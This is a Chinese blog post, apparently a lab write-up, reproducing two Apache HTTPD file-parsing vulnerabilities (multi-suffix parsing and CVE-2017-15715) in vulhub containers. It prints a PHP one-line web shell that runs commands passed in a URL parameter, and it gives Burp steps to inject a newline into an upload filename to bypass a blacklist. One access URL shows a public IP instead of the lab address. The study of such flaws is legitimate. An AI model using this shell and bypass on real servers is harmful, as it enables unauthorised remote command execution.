【Apache】Apache HTTPD漏洞复现

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦


Apache HTTPD 多后缀解析漏洞(apache_parsing_vulnerability)

漏洞环境
该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/apache_parsing_vulnerability。进入该漏洞路径后执行以下命令:

docker-compose up -d

漏洞复现
打开目标地址 http://192.168.119.131:80/,将一句话木马保存为 a.php.jpg,并上传到服务器。

 <?php system($_GET['a']);?>

在这里插入图片描述
在这里插入图片描述

访问一句话木马,并通过参数a传递命令。
在这里插入图片描述
命令执行成功


Apache HTTPD 换行解析漏洞(CVE-2017-15715)

Apache在2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时,如果文件名最后有一个换行符x0A,apache依然会将其当成php解析,但是在上传文件时可以成功的绕过黑名单。
如果上传文件的php程序是设置的白名单,那么这个漏洞将无法利用。

漏洞环境
该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/CVE-2017-15715。进入该漏洞路径后执行以下命令:

docker-compose up -d

查看上传文件的php文件:

cat index.php

该程序是采用黑名单的形式,如果文件后缀名不在名单内即可上传,所以 1.php\x0A不在黑名单列表中,可以上传。但是x0A是换行符,所以apache会直接忽略,将其当成php来执行。

漏洞复现
打开目标地址 http://192.168.119.131:8080/,选择一句话木马准备上传。

<?php phpinfo(); ?> 

在这里插入图片描述

上传文件,使用Burp Suite抓包
点击 Hex按钮,进入十六进制编辑页面,并找到文件名1.php的位置
在这里插入图片描述

在文件名后插入0a(换行符),即上图700d之间
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

点击 Forward按钮,这时候浏览器上什么也没有显示,但是此时文件已经上传成功了。
访问一句话木马a.php%0a

http://38.6.177.6:8080/1.php%0a

在这里插入图片描述
命令执行成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值